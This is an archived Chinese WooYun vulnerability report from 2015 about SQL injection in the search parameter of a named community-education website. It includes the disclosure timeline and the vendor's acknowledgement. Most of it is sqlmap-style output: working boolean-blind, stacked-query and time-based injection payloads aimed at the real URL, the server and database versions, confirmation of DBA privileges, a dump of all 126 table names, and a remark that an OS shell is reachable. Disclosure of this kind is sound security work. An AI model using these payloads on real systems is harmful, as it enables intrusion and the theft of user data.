乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-01: 细节已通知厂商并且等待厂商处理中 2015-06-01: 厂商已经确认,细节仅向厂商公开 2015-06-11: 细节向核心白帽子及相关领域专家公开 2015-06-21: 细节向普通白帽子公开 2015-07-01: 细节向实习白帽子公开 2015-07-16: 细节向公众公开
233
http://www.ln86e.com/Shequ/Search.aspx?page=1&SearchTxt=1&tag=1 搜索关键字
---Parameter: SearchTxt (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page=1&SearchTxt=-2599' OR 9566=9566 AND 'Sdri' LIKE 'Sdri&tag=1 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: page=1&SearchTxt=1';(SELECT * FROM (SELECT(SLEEP(5)))ZcZJ)#&tag=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: page=1&SearchTxt=1' AND (SELECT * FROM (SELECT(SLEEP(5)))bKfN) AND 'ihhG' LIKE 'ihhG&tag=1---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: MySQL 5.0.11current user is DBA: TrueDatabase: ln_zsxx[126 tables]+----------------------------+| user || accounts_department || accounts_rolepermissions || accounts_roles || accounts_userroles || accounts_users || admobile || advertisement || agednesscommunity || agednesscommunityclass || b_cataloglist || b_cataloglist1115bak || b_curlesson || b_favorites || b_lessionmessage || b_lesson || b_lesson1115bak || b_lesson_jxjy || b_lesson_ncjy || b_lesson_recm || b_lesson_woman || b_lessonappraise || b_lessoncount || b_lessoncount0619bak || b_lessongroup || b_lessonjoin || b_lessonnote || b_lessonnote_ding || b_lessonnotefavorites || b_lessonnoterecommend || b_lessonnotereply || b_lessontimecount || b_lessontimecount_copy || b_lessontimecountitem || b_lessontimecountitem_copy || b_lessontimehistory || b_lessontype || b_news || b_newsclass || b_package || b_package1115bak || b_packagelist || b_photo || b_recommend || b_studytask || b_teacherforum || b_videolist || b_videolist1115bak || b_videopackage || b_viewvideo || b_viewvideo_debug || b_viewvideorec || blogroll || copyright || event_category || event_data || event_photo || event_video || getpwds || mpsysmsg || mpsysmsgread || new_table_name || nonacademic || nonacademicdetail || onlinecount || onlinelist || packageidtounitid || packageidtounitidbyname || rankcity || rankles || s_dictionary || s_tree || shequ_advertisement || shequ_area || shequ_city || shequ_data || shequ_forum || shequ_lesson || shequ_news || shequ_newsclass || shequ_user || shequ_user_visit || shequ_volunteer || site || sitetotal || starlevel || starleveltop || system_log || t_advertisement || t_app_version || t_category || t_comment || t_credit_admin_log || t_credit_log || t_digglog || t_feedback || t_hotsearch || t_lesson || t_lesson_appraise || t_lesson_collect || t_lesson_command || t_menu || t_rolemenus || t_roles || t_slogan || t_syslog || t_systemlog || t_systemuser || t_sysuser || t_user_creditrule || t_user_level || t_user_video || t_userroles || user_count || user_follow || user_follow_message || user_sys_message || user_sys_message_status || user_tblog || user_tblog_comment || userstat || userstatcount || userstatlogincount || x_config || x_log || x_online |+----------------------------+可os-shell
~
危害等级:高
漏洞Rank:10
确认时间:2015-06-01 20:07
感谢 路人甲 提供的漏洞,安排修复中
暂无